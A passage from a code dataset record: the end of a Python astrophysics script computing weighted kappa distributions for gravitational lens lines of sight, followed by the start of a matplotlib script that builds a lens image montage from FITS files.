med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n print j,i\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,1,2,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n print j,i\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,1,2,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,weight4_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n weight = np.copy(weight4_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j,i\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) + E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nnp.savetxt(output,unbiased_kappa_constrained,fmt='%s',delimiter='\\t',newline='\\n')\nnp.savetxt(outputLOS,np.array([LOS]),fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6406829953193665, "alphanum_fraction": 0.6636971235275269, "avg_line_length": 55.125, "blob_id": "c91c84f680fb973bdf2203393b4dfa0655cca788", "content_id": "13292fdcc88951631afa5ba3c391a317caf39516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2694, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/python/plot_utilities/image_tibi.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates the lens montage in Berghea et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nimage_g = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/g_cut.fits\")\nimage_r = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/r_cut.fits\")\nimage_i = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_cut.fits\")\nimage_z = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_cut.fits\")\nimage_y = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_cut.fits\")\nimage_g_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/g_sub.fits\")\nimage_r_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/r_sub.fits\")\nimage_i_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_sub.fits\")\nimage_z_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_sub.fits\")\nimage_y_sub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_sub.fits\")\nimage_i_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/i_lenssub.fits\")\nimage_z_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/z_lenssub.fits\")\nimage_y_lenssub = fits.getdata(\"/Users/eduardrusu/GITHUB/tibi/y_lenssub.fits\")\nfig = plt.figure(figsize=(5,3))\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\n\nfor i in range(15):\n ax1 = plt.subplot(3,5,i+1, sharex=ax1, sharey=ax1)\n ax1.axes.get_xaxis().set_visible(False)\n ax1.axes.get_yaxis().set_visible(False)\n if i == 0: plt.imshow(image_g, cmap='gray_r', origin='lower')\n if i == 1: plt.imshow(image_r, cmap='gray_r', origin='lower')\n if i == 2: plt.imshow(image_i, cmap='gray_r', origin='lower')\n if i == 3: plt.imshow(image_z, cmap='gray_r', origin='lower')\n if i == 4: plt.imshow(image_y, cmap='gray_r', origin='lower')\n if i == 5: plt.imshow(image_g_sub, cmap='gray_r', origin='lower')\n if i == 6: plt.imshow(image_r_sub, cmap='gray_r', origin='lower')\n if i == 7: plt.imshow(image_i_sub, cmap='gray_r', origin='lower')\n if i == 8: plt.imshow(image_z_sub, cmap='gray_r', origin='lower')\n if i == 9: plt.imshow(image_y_sub, cmap='gray_r', origin='lower')\n if i == 10: plt.imshow(image_g_sub, cmap='gray_r', origin='lower')\n if i == 11: plt.imshow(image_r_sub, cmap='gray_r', origin='lower')\n if i == 12: plt.imshow(image_i_lenssub, cmap='gray_r', origin='lower')\n if i == 13: plt.imshow(image_z_lenssub, cmap='gray_r', origin='lower')\n if i == 14: plt.imshow(image_y_lenssub, cmap='gray_r', 